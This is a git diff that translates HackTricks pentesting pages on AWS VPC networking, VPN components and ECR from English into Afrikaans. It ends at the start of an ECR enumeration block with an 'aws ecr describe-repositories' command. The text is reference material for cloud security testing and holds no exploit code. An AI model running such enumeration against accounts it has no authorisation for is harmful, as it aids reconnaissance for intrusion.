-- A subnet cannot be in different availability zones at the same time.
-- **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use.
-- It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.**
+- Geldige CIDR is van 'n /16 netmask tot 'n /28 netmask.
+- 'n Subnet kan nie in verskillende beskikbaarheidsgebiede terselfdertyd wees nie.
+- **AWS reserveer die eerste drie gasthost IP-adresse** van elke subnet **vir** **interne AWS-gebruik**: die eerste gasthostadres wat gebruik word, is vir die VPC-router. Die tweede adres is gereserveer vir AWS DNS en die derde adres is gereserveer vir toekomstige gebruik.
+- Dit word **publieke subnetwerke** genoem vir diegene wat **direkte toegang tot die internet het, terwyl private subnetwerke dit nie het nie.**
 
 <figure><img src="https://lh5.googleusercontent.com/N_WTrTrDAHwN61FMKJvLSHVua2EM0IazHH1fSTg8JQfTChm-dLN9mn7wkjz2MlpD-uOUqtWdMZpqKOp4VxaHy5-5X66GD1K8y1UGc27r-GbHdFty9ImpXdcjEsC7u4vjxKme_B_HwDOUnG6camxENYECTw=s2048" alt=""><figcaption></figcaption></figure>
 
@@ -42,15 +42,15 @@ Subnets helps to enforce a greater level of security. **Logical grouping of simi
 
 ### Route Tables
 
-Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the:
+Routeringstabelle bepaal die verkeerroutering vir 'n subnet binne 'n VPC. Hulle bepaal watter netwerkverkeer na die internet of na 'n VPN-verbinding gestuur word. Jy sal gewoonlik toegang vind tot die:
 
-- Local VPC
+- Plaaslike VPC
 - NAT
-- Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet).
-  - In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC.
-- VPC endpoints (to access S3 from private networks)
+- Internet-gateways / Egress-only Internet gateways (nodig om 'n VPC toegang tot die internet te gee).
+- Om 'n subnet publiek te maak, moet jy 'n **Internet-gateway** **skep** en **heg** aan jou VPC.
+- VPC-eindpunte (om toegang tot S3 vanaf private netwerke te verkry)
 
-In the following images you can check the differences in a default public network and a private one:
+In die volgende beelde kan jy die verskille in 'n standaard publieke netwerk en 'n private een nagaan:
 
 <figure><img src="https://lh3.googleusercontent.com/q4ASpcLAYqijdNMLhMLl8EoowDtTMU5I_7YCVfk7-5hxDyeQOik9ImHnD2SYy32XUA2qXjEbXTAxA1lP--znJASdhYOdBveDcrD42f9XBKZ3EmjJCazN3YPLC6oS0xtRMmfORuwCszmMt-KrAkH07_izwg=s2048" alt=""><figcaption></figcaption></figure>
 
@@ -58,142 +58,138 @@ In the following images you can check the differences in a default public networ
 
 ### ACLs
 
-**Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges.
+**Netwerk Toegang Beheer Lyste (ACLs)**: Netwerk ACLs is firewall-reëls wat inkomende en uitgaande netwerkverkeer na 'n subnet beheer. Hulle kan gebruik word om verkeer na spesifieke IP-adresse of reekse toe te laat of te weier.
 
-- It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections
-- However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed
+- Dit is die mees algemene om toegang toe te laat/te weier met behulp van veiligheidsgroepe, maar dit is die enigste manier om gevestigde omgekeerde skulpies heeltemal te sny. 'n Gewysigde reël in 'n veiligheidsgroep stop nie reeds gevestigde verbindings nie.
+- Dit geld egter vir die hele subnetwerk, wees versigtig wanneer jy goed verbied, want nodige funksionaliteit mag versteur word.
 
 ### Security Groups
 
-Security groups are a virtual **firewall** that control inbound and outbound network **traffic to instances** in a VPC. Relation 1 SG to M instances (usually 1 to 1).\
-Usually this is used to open dangerous ports in instances, such as port 22 for example:
+Veiligheidsgroepe is 'n virtuele **firewall** wat inkomende en uitgaande netwerk **verkeer na instansies** in 'n VPC beheer. Verhouding 1 SG tot M instansies (gewoonlik 1 tot 1).\
+Gewoonlik word dit gebruik om gevaarlike poorte in instansies te open, soos poort 22 byvoorbeeld:
 
 <figure><img src="https://lh5.googleusercontent.com/LliB7eb3cYfkEyOpyw1-eYgWsn2kq1yF6uRn5VYndvOuTvDlURimYx9UvuK8F2impTLmx50mid4MdTXE-Ljt2i_rxaIfnKUdji_hFjCdU9tdoW-axng9-W4tSL71gbbjrPQ7IYY5lAdH_G3UoMRMGGGOxQ=s2048" alt=""><figcaption></figcaption></figure>
 
 ### Elastic IP Addresses
 
-An _Elastic IP address_ is a **static IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account.
+'n _Elastic IP-adres_ is 'n **statische IPv4-adres** wat ontwerp is vir dinamiese wolkrekenaars. 'n Elastic IP-adres word aan jou AWS-rekening toegeken, en is joune totdat jy dit vrystel. Deur 'n Elastic IP-adres te gebruik, kan jy die mislukking van 'n instansie of sagteware maskeer deur die adres vinnig na 'n ander instansie in jou rekening te herverdeel.
 
 ### Connection between subnets
 
-By default, all subnets have the **automatic assigned of public IP addresses turned off** but it can be turned on.
+Standaard het alle subnetwerke die **outomatiese toewysing van openbare IP-adresse afgeskakel**, maar dit kan aangeskakel word.
 
-**A local route within a route table enables communication between VPC subnets.**
+**'n Plaaslike roete binne 'n routeringstabel stel kommunikasie tussen VPC-subnetwerke in staat.**
 
-If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet.
+As jy 'n **subnet met 'n ander subnet verbind, kan jy nie die subnetwerke wat met die ander subnet verbind is, bereik nie; jy moet direk verbinding met hulle maak.** **Dit geld ook vir internet-gateways**. Jy kan nie deur 'n subnetverbinding gaan om toegang tot die internet te verkry nie; jy moet die internet-gateway aan jou subnet toewys.
 
 ### VPC Peering
 
-VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
+VPC-peering stel jou in staat om **twee of meer VPCs aan mekaar te verbind**, met behulp van IPV4 of IPV6, asof hulle deel van dieselfde netwerk is.
 
-Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\
-If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
-Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
+Sodra die peerverbinding gevestig is, kan **hulpbronne in een VPC toegang verkry tot hulpbronne in die ander**. Die verbinding tussen die VPCs word deur die bestaande AWS-netwerkinfrastruktuur geïmplementeer, en is dus hoogs beskikbaar sonder enige bandwydte-bottlenecks. Aangesien **gepeerde verbindings werk asof hulle deel van dieselfde netwerk is**, is daar beperkings wanneer dit kom by jou CIDR-blokreekse wat gebruik kan word.\
+As jy **oorlappende of duplikaat CIDR** reekse vir jou VPC het, dan **sal jy nie in staat wees om die VPCs** saam te peer nie.\
+Elke AWS VPC sal **slegs met sy peer kommunikeer**. As 'n voorbeeld, as jy 'n peeringverbinding tussen VPC 1 en VPC 2 het, en 'n ander verbinding tussen VPC 2 en VPC 3 soos getoon, dan kan VPC 1 en 2 direk met mekaar kommunikeer, soos VPC 2 en VPC 3, maar VPC 1 en VPC 3 kan nie. **Jy kan nie deur een VPC roete om by 'n ander te kom nie.**
 
 ### **VPC Flow Logs**
 
-Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**.
+Binne jou VPC kan jy potensieel honderde of selfs duisende hulpbronne hê wat tussen verskillende subnetwerke kommunikeer, beide publiek en privaat, en ook tussen verskillende VPCs deur VPC-peeringverbindinge. **VPC Flow Logs stel jou in staat om IP-verkeersinligting vas te vang wat tussen jou netwerkinterfaces van jou hulpbronne binne jou VPC vloei**.
 
-Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**.
+In teenstelling met S3-toeganglogs en CloudFront-toeganglogs, word die **logdata wat deur VPC Flow Logs gegenereer word, nie in S3 gestoor nie. In plaas daarvan word die logdata wat vasgevang word, na CloudWatch logs gestuur**.
 
-Limitations:
+Beperkings:
 
-- If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account.
-- If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces
-- Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one.
-- The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server.
-- Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service.
-- Traffic relating to an Amazon Windows activation license from a Windows instance
-- Traffic between a network load balancer interface and an endpoint network interface
+- As jy 'n VPC-gepeerde verbinding het, sal jy slegs die vloei logs van gepeerde VPCs wat binne dieselfde rekening is, kan sien.
+- As jy steeds hulpbronne binne die EC2-Classic omgewing bestuur, kan jy ongelukkig nie inligting van hul interfaces verkry nie.
+- Sodra 'n VPC Flow Log geskep is, kan dit nie verander word nie. Om die VPC Flow Log-konfigurasie te verander, moet jy dit verwyder en dan 'n nuwe een herskep.
+- Die volgende verkeer word nie gemonitor en vasgevang deur die logs nie. DHCP-verkeer binne die VPC, verkeer van instansies wat bestem is vir die Amazon DNS-server.
+- Enige verkeer wat bestem is vir die IP-adres van die VPC se standaardrouter en verkeer na en van die volgende adresse, 169.254.169.254 wat gebruik word om instansiemetadataversameling, en 169.254.169.123 wat gebruik word vir die Amazon Time Sync Service.
+- Verkeer wat verband hou met 'n Amazon Windows aktiveringslisensie van 'n Windows-instansie
+- Verkeer tussen 'n netwerklaaibalansierinterface en 'n eindpuntnetwerkinterface
 
-For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**.
+Vir elke netwerkinterface wat data na die CloudWatch-loggroep publiseer, sal dit 'n ander logstroom gebruik. En binne elkeen van hierdie strome sal daar die vloei log gebeurtenisdata wees wat die inhoud van die loginskrywings toon. Elke een van hierdie **logs vang data vas gedurende 'n venster van ongeveer 10 tot 15 minute**.
 
 ## VPN
 
 ### Basic AWS VPN Components
 
-1. **Customer Gateway**:
-   - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
-   - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
-   - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
-   - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
-2. **Virtual Private Gateway**:
-   - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
-   - It is attached to your VPC and serves as the target for your VPN connection.
-   - VPG is the AWS side endpoint for the VPN connection.
-   - It handles the secure communication between your VPC and your on-premises network.
+1. **Kliënt Gateway**:
+- 'n Kliënt Gateway is 'n hulpbron wat jy in AWS skep om jou kant van 'n VPN-verbinding te verteenwoordig.
+- Dit is essensieel 'n fisiese toestel of sagtewaretoepassing aan jou kant van die Site-to-Site VPN-verbinding.
+- Jy verskaf routeringinligting en die openbare IP-adres van jou netwerktoestel (soos 'n router of 'n firewall) aan AWS om 'n Kliënt Gateway te skep.
+- Dit dien as 'n verwysingspunt vir die opstelling van die VPN-verbinding en bring geen addisionele koste mee nie.
+2. **Virtuele Privaat Gateway**:
+- 'n Virtuele Privaat Gateway (VPG) is die VPN-konsentrasie aan die Amazon-kant van die Site-to-Site VPN-verbinding.
+- Dit is aan jou VPC geheg en dien as die teiken vir jou VPN-verbinding.
+- VPG is die AWS-kant eindpunt vir die VPN-verbinding.
+- Dit hanteer die veilige kommunikasie tussen jou VPC en jou plaaslike netwerk.
 3. **Site-to-Site VPN Connection**:
-   - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
-   - This type of connection requires a Customer Gateway and a Virtual Private Gateway.
-   - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
-   - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
-4. **Client VPN Endpoint**:
-   - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
-   - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
-   - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
-   - With Client VPN, each client device uses a VPN client software to establish a secure connection.
+- 'n Site-to-Site VPN-verbinding verbind jou plaaslike netwerk met 'n VPC deur 'n veilige, IPsec VPN-tunnel.
+- Hierdie tipe verbinding vereis 'n Kliënt Gateway en 'n Virtuele Privaat Gateway.
+- Dit word gebruik vir veilige, stabiele en konsekwente kommunikasie tussen jou datacentrum of netwerk en jou AWS-omgewing.
+- Gewoonlik gebruik vir gereelde, langtermynverbindinge en word gefaktureer op grond van die hoeveelheid data wat oor die verbinding oorgedra word.
+4. **Kliënt VPN Eindpunt**:
+- 'n Kliënt VPN-eindpunt is 'n hulpbron wat jy in AWS skep om kliënt VPN-sessies in te stel en te bestuur.
+- Dit word gebruik om individuele toestelle (soos skootrekenaars, slimfone, ens.) veilig met AWS-hulpbronne of jou plaaslike netwerk te verbind.
+- Dit verskil van Site-to-Site VPN in die sin dat dit ontwerp is vir individuele kliënte eerder as om hele netwerke te verbind.
+- Met Kliënt VPN gebruik elke kliënttoestel 'n VPN-kliënt sagteware om 'n veilige verbinding te vestig.
 
 ### Site-to-Site VPN
 
-**Connect your on premisses network with your VPC.**
+**Verbind jou plaaslike netwerk met jou VPC.**
 
-- **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
-- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
+- **VPN-verbinding**: 'n Veilige verbinding tussen jou plaaslike toerusting en jou VPCs.
+- **VPN-tunnel**: 'n Geënkripteerde skakel waar data van die kliëntnetwerk na of van AWS kan beweeg.
 
-  Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability.
+Elke VPN-verbinding sluit twee VPN-tunnels in wat jy gelyktydig kan gebruik vir hoë beskikbaarheid.
 
-- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device.
-- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection.
-- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
-- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
+- **Kliëntgateway**: 'n AWS-hulpbron wat inligting aan AWS verskaf oor jou kliëntgateway-toestel.
+- **Kliëntgateway-toestel**: 'n Fisiese toestel of sagtewaretoepassing aan jou kant van die Site-to-Site VPN-verbinding.
+- **Virtuele privaat gateway**: Die VPN-konsentrasie aan die Amazon-kant van die Site-to-Site VPN-verbinding. Jy gebruik 'n virtuele privaat gateway of 'n transit gateway as die gateway vir die Amazon-kant van die Site-to-Site VPN-verbinding.
+- **Transit gateway**: 'n Transit-hub wat gebruik kan word om jou VPCs en plaaslike netwerke met mekaar te verbind. Jy gebruik 'n transit gateway of virtuele privaat gateway as die gateway vir die Amazon-kant van die Site-to-Site VPN-verbinding.
 
 #### Limitations
 
-- IPv6 traffic is not supported for VPN connections on a virtual private gateway.
-- An AWS VPN connection does not support Path MTU Discovery.
+- IPv6-verkeer word nie ondersteun vir VPN-verbindinge op 'n virtuele privaat gateway nie.
+- 'n AWS VPN-verbinding ondersteun nie Path MTU Discovery nie.
 
-In addition, take the following into consideration when you use Site-to-Site VPN.
+Boonop, neem die volgende in ag wanneer jy Site-to-Site VPN gebruik.
 
-- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
+- Wanneer jy jou VPCs aan 'n gemeenskaplike plaaslike netwerk verbind, beveel ons aan dat jy nie-oorlappende CIDR-blokke vir jou netwerke gebruik.
 
-### Client VPN <a href="#what-is-components" id="what-is-components"></a>
+### Kliënt VPN <a href="#what-is-components" id="what-is-components"></a>
 
-**Connect from your machine to your VPC**
+**Verbind vanaf jou masjien na jou VPC**
 
 #### Concepts
 
-- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
-- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
-- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks.
-- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.
-- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.
-- **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`.
-- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.
-- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address.
-- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
-- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
+- **Kliënt VPN eindpunt:** Die hulpbron wat jy skep en konfigureer om kliënt VPN-sessies in te stel en te bestuur. Dit is die hulpbron waar alle kliënt VPN-sessies beëindig word.
+- **Teiken netwerk:** 'n Teiken netwerk is die netwerk wat jy met 'n Kliënt VPN-eindpunt assosieer. **'n Subnet van 'n VPC is 'n teiken netwerk**. Om 'n subnet met 'n Kliënt VPN-eindpunt te assosieer, stel jou in staat om VPN-sessies te vestig. Jy kan verskeie subnetwerke met 'n Kliënt VPN-eindpunt assosieer vir hoë beskikbaarheid. Alle subnetwerke moet van dieselfde VPC wees. Elke subnet moet aan 'n ander beskikbaarheidsgebied behoort.
+- **Roete**: Elke Kliënt VPN-eindpunt het 'n routeringstabel wat die beskikbare bestemmingsnetwerkroetes beskryf. Elke roete in die routeringstabel spesifiseer die pad vir verkeer na spesifieke hulpbronne of netwerke.
+- **Outorisasiereëls:** 'n autorisatiereël **beperk die gebruikers wat toegang tot 'n netwerk kan verkry**. Vir 'n spesifieke netwerk, konfigureer jy die Active Directory of identiteitsverskaffer (IdP) groep wat toegang verleen. Slegs gebruikers wat tot hierdie groep behoort, kan toegang tot die spesifieke netwerk verkry. **Standaard is daar geen autorisatiereëls nie** en jy moet autorisatiereëls konfigureer om gebruikers in staat te stel om toegang tot hulpbronne en netwerke te verkry.
+- **Kliënt:** Die eindgebruiker wat met die Kliënt VPN-eindpunt verbind om 'n VPN-sessie te vestig. Eindgebruikers moet 'n OpenVPN-kliënt aflaai en die Kliënt VPN-konfigurasiefilenaam wat jy geskep het, gebruik om 'n VPN-sessie te vestig.
+- **Kliënt CIDR-reeks:** 'n IP-adresreeks waaruit kliënt IP-adresse toegeken kan word. Elke verbinding met die Kliënt VPN-eindpunt word aan 'n unieke IP-adres van die kliënt CIDR-reeks toegeken. Jy kies die kliënt CIDR-reeks, byvoorbeeld, `10.2.0.0/16`.
+- **Kliënt VPN-poorte:** AWS Kliënt VPN ondersteun poorte 443 en 1194 vir beide TCP en UDP. Die standaard is poort 443.
+- **Kliënt VPN-netwerkinterfaces:** Wanneer jy 'n subnet met jou Kliënt VPN-eindpunt assosieer, skep ons Kliënt VPN-netwerkinterfaces in daardie subnet. **Verkeer wat na die VPC van die Kliënt VPN-eindpunt gestuur word, word deur 'n Kliënt VPN-netwerkinterface gestuur**. Bron netwerkadresvertaling (SNAT) word dan toegepas, waar die bron IP-adres van die kliënt CIDR-reeks na die Kliënt VPN-netwerkinterface IP-adres vertaal word.
+- **Verbindingslogging:** Jy kan verbindingslogging vir jou Kliënt VPN-eindpunt inskakel om verbindingsgebeurtenisse te log. Jy kan hierdie inligting gebruik om forensiese ondersoeke te doen, analiseer hoe jou Kliënt VPN-eindpunt gebruik word, of verbindingsprobleme te ontleed.
+- **Selfdiensportaal:** Jy kan 'n selfdiensportaal vir jou Kliënt VPN-eindpunt inskakel. Kliënte kan inlog op die web-gebaseerde portaal met hul geloofsbriewe en die nuutste weergawe van die Kliënt VPN-eindpunt konfigurasiefilenaam aflaai, of die nuutste weergawe van die AWS verskafde kliënt.
 
 #### Limitations
 
-- **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
-- Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
-- A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.
-- The **client CIDR range cannot be changed** after you create the Client VPN endpoint.
-- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**.
-- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**.
-- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**.
-- Client VPN supports **IPv4** traffic only.
-- Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**.
-- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format.
+- **Kliënt CIDR-reekse kan nie oorvleuel met die plaaslike CIDR** van die VPC waarin die geassosieerde subnet geleë is nie, of enige roetes wat handmatig by die Kliënt VPN-eindpunt se routeringstabel gevoeg is.
+- Kliënt CIDR-reekse moet 'n blokgrootte van ten **minste /22** hê en mag **nie groter wees as /12 nie.**
+- 'n **Deel van die adresse** in die kliënt CIDR-reeks word gebruik om die **beskikbaarheids** model van die Kliënt VPN-eindpunt te ondersteun, en kan nie aan kliënte toegeken word nie. Daarom beveel ons aan dat jy **'n CIDR-blok toewys wat twee keer die aantal IP-adresse bevat wat benodig word** om die maksimum aantal gelyktydige verbindings wat jy van plan is om te ondersteun op die Kliënt VPN-eindpunt, in staat te stel.
+- Die **kliënt CIDR-reeks kan nie verander word** nadat jy die Kliënt VPN-eindpunt geskep het nie.
+- Die **subnetwerke** wat met 'n Kliënt VPN-eindpunt geassosieer is, **moet in dieselfde VPC wees**.
+- Jy **kan nie verskeie subnetwerke van dieselfde beskikbaarheidsgebied met 'n Kliënt VPN-eindpunt assosieer nie**.
+- 'n Kliënt VPN-eindpunt **ondersteun nie subnetassosiasies in 'n toegewyde huur VPC nie**.
+- Kliënt VPN ondersteun **IPv4** verkeer slegs.
+- Kliënt VPN is **nie** Federale Inligting Verwerkingsstandaarde (**FIPS**) **konform nie**.
+- As multi-faktor verifikasie (MFA) vir jou Active Directory gedeaktiveer is, kan 'n gebruikerswagwoord nie in die volgende formaat wees nie.
 
-  ```
-  SCRV1:<base64_encoded_string>:<base64_encoded_string>
-  ```
+```
+SCRV1:<base64_encoded_string>:<base64_encoded_string>
+```
 
-- The self-service portal is **not available for clients that authenticate using mutual authentication**.
+- Die selfdiensportaal is **nie beskikbaar vir kliënte wat met behulp van wederkerige verifikasie autentiseer nie**.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
index 9025829b4..9562d48a1 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
@@ -6,49 +6,48 @@
 
 ### ECR
 
-#### Basic Information
+#### Basiese Inligting
 
-Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.
+Amazon **Elastic Container Registry** (Amazon ECR) is 'n **bestuurde houerbeeld registrasiediens**. Dit is ontwerp om 'n omgewing te bied waar kliënte met hul houerbeelde kan interaksie hê deur middel van bekende koppelvlakke. Spesifiek word die gebruik van die Docker CLI of enige verkiesde kliënt ondersteun, wat aktiwiteite soos die stoot, trek en bestuur van houerbeelde moontlik maak.
 
-ECR is compose by 2 types of objects: **Registries** and **Repositories**.
+ECR bestaan uit 2 tipes voorwerpe: **Registrasies** en **Bergings**.
 
-**Registries**
+**Registrasies**
 
-Every AWS account has 2 registries: **Private** & **Public**.
+Elke AWS-rekening het 2 registrasies: **Privaat** & **Publiek**.
 
-1. **Private Registries**:
+1. **Privaat Registrasies**:
 
-- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission.
-  - The URI of a **private repository** follows the format `<account_id>.dkr.ecr.<region>.amazonaws.com/<repo-name>`
-- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles.
-- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS...
-- **Other private registry options**:
-  - The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images.
-  - The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions.
-  - The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**.
-  - Specific **IAM policies** can be configured to grant different **permissions**.
-  - The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo.
+- **Privaat per standaard**: Die houerbeelde wat in 'n Amazon ECR privaat registrasie gestoor word, is **slegs toeganklik vir gemagtigde gebruikers** binne jou AWS-rekening of vir diegene aan wie toestemming gegee is.
+- Die URI van 'n **privaat berging** volg die formaat `<account_id>.dkr.ecr.<region>.amazonaws.com/<repo-name>`
+- **Toegangsbeheer**: Jy kan **toegang beheer** tot jou privaat houerbeelde deur middel van **IAM-beleide**, en jy kan fyn-granige toestemmings op grond van gebruikers of rolle konfigureer.
+- **Integrasie met AWS-dienste**: Amazon ECR privaat registrasies kan maklik **geïntegreer word met ander AWS-dienste**, soos EKS, ECS...
+- **Ander privaat registrasie opsies**:
+- Die Tag onveranderlikheid kolom lys sy status, as tag onveranderlikheid geaktiveer is, sal dit **verhoed** dat beeld **stoot** met **bestaande tags** die beelde oorskryf.
+- Die **Enkripsietipe** kolom lys die enkripsie eienskappe van die berging, dit wys die standaard enkripsietipes soos AES-256, of het **KMS** geaktiveerde enkripsies.
+- Die **Trek deur kas** kolom lys sy status, as Trek deur kas status Aktief is, sal dit **bergings in 'n eksterne publieke berging in jou privaat berging** kas.
+- Spesifieke **IAM-beleide** kan geconfigureer word om verskillende **toestemmings** toe te ken.
+- Die **skandeer konfigurasie** laat toe om vir kwesbaarhede in die beelde wat binne die berging gestoor is, te skandeer.
 
-2. **Public Registries**:
+2. **Publieke Registrasies**:
 
-- **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.**
-  - The URI of a **public repository** is like `public.ecr.aws/<random>/<name>`. Although the `<random>` part can be changed by the admin to another string easier to remember.
+- **Publieke toeganklikheid**: Houerbeelde wat in 'n ECR Publieke registrasie gestoor word, is **toeganklik vir enigiemand op die internet sonder verifikasie.**
+- Die URI van 'n **publieke berging** is soos `public.ecr.aws/<random>/<name>`. Alhoewel die `<random>` deel deur die admin na 'n ander string wat makliker om te onthou is, verander kan word.
 
-**Repositories**
+**Bergings**
 
-These are the **images** that in the **private registry** or to the **public** one.
+Dit is die **beelde** wat in die **privaat registrasie** of in die **publieke** een is.
 
 > [!NOTE]
-> Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**.
+> Let daarop dat om 'n beeld na 'n berging op te laai, die **ECR berging dieselfde naam as die beeld moet hê**.
 
-#### Registry & Repository Policies
+#### Registrasie & Berging Beleide
 
-**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image:
+**Registrasies & bergings** het ook **beleide wat gebruik kan word om toestemmings aan ander beginsels/rekeninge toe te ken**. Byvoorbeeld, in die volgende berging beleid beeld kan jy sien hoe enige gebruiker van die hele organisasie toegang tot die beeld sal hê:
 
 <figure><img src="../../../images/image (280).png" alt=""><figcaption></figcaption></figure>
 
-#### Enumeration
-
+#### Enumerasie
 ```bash
 # Get repos
 aws ecr describe-repositories
